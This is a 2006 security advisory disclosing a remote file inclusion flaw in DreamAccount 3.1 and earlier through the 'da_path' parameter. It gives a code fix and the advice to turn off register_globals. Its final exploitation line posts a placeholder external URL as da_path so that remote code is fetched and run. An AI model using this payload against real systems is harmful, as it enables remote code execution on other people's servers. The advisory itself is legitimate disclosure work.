[MajorSecurity #8]DreamAccount <= 3.1 - Remote File Include Vulnerability
[MajorSecurity #8]DreamAccount <= 3.1 - Remote File Include Vulnerability
-------------------------------------------------------------------------
Software: DreamAccount
Version: <=3.1
Type: Remote File Include Vulnerability
Date: June, 3rd 2006
Vendor: dreamcost
Page: http://dreamcost.com
Risc: High
Credits:
----------------------------
Discovered by: David 'Aesthetico' Vieira-Kurz
http://www.majorsecurity.de
Original Advisory:
----------------------------
http://www.majorsecurity.de/advisory/major_rls8.txt
Affected Products:
----------------------------
DreamAccount 3.1 and prior
Description:
----------------------------
DreamAccount is a membership and subscription software application that is both
simple to use and install,
while remaining affordable enough for even the smallest startup.
Requirements:
----------------------------
register_globals = On
Vulnerability:
----------------------------
Input passed to the "da_path" parameter in "auth.cookie.inc.php" is not
properly verified, before it is used to include files.
This can be exploited to execute arbitrary code by including files from
external resources.
Solution:
----------------------------
I think you can fix this bug by replacing the following vulnerable code in the
"auth.cookie.inc.php" with my one. It should fix the vulnerabilty and solve this
problem.
Vulnerable one: "require($da_path . "setup.php");"
MajorSecurity fix: "require("setup.php");"
Set "register_globals" to "Off".
Exploitation:
----------------------------
Post data:
da_path=http://www.yourspace.com/yourscript.php?